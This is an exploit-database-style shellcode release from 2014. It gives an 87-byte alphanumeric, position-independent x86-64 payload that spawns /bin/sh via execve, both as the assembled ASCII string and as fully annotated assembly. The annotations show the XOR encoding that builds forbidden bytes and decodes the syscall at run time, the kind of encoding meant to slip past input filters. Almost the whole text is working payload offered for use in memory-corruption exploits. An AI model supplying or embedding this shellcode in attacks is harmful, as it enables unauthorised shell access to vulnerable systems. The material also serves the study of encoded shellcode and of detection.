#Title: Position independent & Alphanumeric 64-bit execve("/bin/sh\0",NULL,NULL); (87 bytes) #Author: Breaking.Technology #Date: 06 November 2014 #Vendor Homepage: http://breaking.technology #Version: x86-64 platforms #Classification: 64 bit shellcode #Shellcode: http://breaking.technology/shellcode/alpha64-binsh.txt # Position independent & Alphanumeric 64-bit execve("/bin/sh\0",NULL,NULL); (87 bytes) # This shellcode will successfully execute every time as long as it is returned to. # (c) 2014 Breaking Technology, Inc. # http://breaking.technology/ # # Assembled (87 bytes): # XXj0TYX45Pk13VX40473At1At1qu1qv1qwHcyt14yH34yhj5XVX1FK1FSH3FOPTj0X40PP4u4NZ4jWSEW18EF0V # # Assembly: # user@host $ as alpha64-binsh.s -o alpha64-binsh.o ; strings alpha64-binsh.o .section .data .section .text .globl _start _start: # "XX" pop %rax # 'X' add $0x8, %rsp ; so we dont overwrite the return pointer pop %rax # 'X' add $0x8, %rsp ; so we dont overwrite the return pointer prepare_ff: # "j0TYX45Pk13" push $0x30 # 'j0' push %rsp # 'T' pop %rcx # 'Y' %rcx points to $0x30 pop %rax # 'X' %rax = 0x30 xor $0x35, %al # '45' %rax = 0x05 push %rax # 'P' (%rcx) = 0x05 imul $0x33, (%rcx), %esi # 'k13' %esi = 0x000000ff prepare_f8: # "VX4047" # mov %rsi, %rax push %rsi # 'V' pop %rax # 'X' %rax = %rsi = 0x000000ff # mov $0xf8, %al xor $0x30, %al # '40' xor $0x37, %al # '47' %rax = 0x000000f8 write_negative_8: # "3At1At1qu1qv1qw" # mov %eax, 0x74(%rcx) xor 0x74(%rcx), %eax # '3At' xor %eax, 0x74(%rcx) # '1At' 0xf8 # mov %sil, 0x75 - 0x77 + rcx xor %esi, 0x75(%rcx) # '1qu' 0xff xor %esi, 0x76(%rcx) # '1qv' 0xff xor %esi, 0x77(%rcx) # '1qw' 0xff # -8 is now on the stack as a 32-bit dword # at 0x74(%rcx) read_negative_8: # "Hcyt" # move long (dword) to signed quadword # mov -8, %rdi movslq 0x74(%rcx), %rdi # 'Hcyt' %rdi is now -0x8 ( 0xfffffffffffffff8 ) get_return_pointer: # "14yH34y" # mov -0x10(%rcx), %rsi <--- THIS IS OUR RETURN POINTER / LOCATION OF short_pc_rsi # OR IN DECIMAL: # mov -16(%rcx), %rsi xor %esi, (%rcx, %rdi, 2) # '14y' xor (%rcx, %rdi, 2), %rsi # 'H34y' prepare_key: # "hj5XVX" # put the xor key into %eax push $0x5658356a # 'hj5XV' pushed backwards because x86 stack. pop %rax # 'X' decode_encoded_code: # "1FK" xor %eax, 0x4b(%rsi) # '1FK' encoded_code ; pops & syscall decoded decode_encoded_data: # "1FSH3FO" xor %eax, 0x53(%rsi) # '1FS' encoded_data + 4 ; "/sh\0" decoded xor 0x4f(%rsi), %rax # 'H3FO' encoded_data ; "/bin/sh\0" now in %rax begin_stack_setup: # "PT" push %rax # 'P' push "/bin/sh\0" push %rsp # 'T' push pointer to /bin/sh zero_rax: # "j0X40" # xor %rax, %rax push $0x30 # 'j0' pop %rax # 'X' xor $0x30, %al # '40' %rax is NULL end_stack_setup: # "PP" push %rax # 'P' push NULL push %rax # 'P' push NULL mov_3b_al: # "4u4N" # mov $0x3b, %al xor $0x75, %al # '4u' xor $0x4e, %al # '4N' %al = 0x4e xor 0x75 = $0x3b # this is for syscall ^ begin_stack_run: # "Z" pop %rdx # 'Z' mov $0x00, %rdx ; %rdx = NULL encoded_code: # "4jWS" # 0x34 0x6a 0x57 0x53 # AFTER XOR MAGIC: .byte 0x34 # "\x5e" pop %rsi ; %rsi = NULL .byte 0x6a # "\x5f" pop %rdi ; %rdi = pointer to "/bin/sh\0" .byte 0x57 # "\x0f" .byte 0x53 # "\x05" syscall ; execve("/bin/sh\0",NULL,NULL); # syscall(%rax) = function(%rdi,%rsi,%rdx); # syscall(0x3b) = execve("/bin/sh\0",NULL,NULL); encoded_data: # "EW18EF0V" turns into "/bin/sh\0" # 0x45 0x57 0x31 0x38 0x45 0x46 0x30 0x56 # AFTER XOR MAGIC: .byte 0x45 # / .byte 0x57 # b .byte 0x31 # i .byte 0x38 # n .byte 0x45 # / .byte 0x46 # s .byte 0x30 # h .byte 0x56 # \0